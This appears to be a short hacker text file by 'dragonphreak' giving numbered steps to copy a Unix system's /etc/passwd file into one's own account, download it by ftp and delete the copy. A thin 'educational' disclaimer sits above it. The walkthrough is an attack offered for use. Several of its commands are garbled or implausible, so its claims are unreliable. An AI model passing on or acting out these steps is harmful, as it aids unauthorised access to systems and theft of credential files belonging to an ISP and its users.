01001: The easiest steps to hacking unix to get the passwd file

By: dragonphreak
disclaimer : i am not responible for your actions this is to show and educated how it is so easy to hack into a unix and get the passwd file



  1. telnet to your isp
  2. Enter into the internet gateway
  3. type ls
  4. type cd/
  5. type cd U
  6. type cd M/youraccountname
  7. type cp /etc/passwd /U/M/youraccountname
  8. type cd
  9. type ls
  10. ftp to your account (ie : ftp://youraccountname@ftp.yourISP)
  11. download the passwd file
  12. type alias rm rm
  13. type rm passwd
  14. that is it!!

unix is case senitive..make sure where i got the uppercase to put the uppercase letter.


Back Forward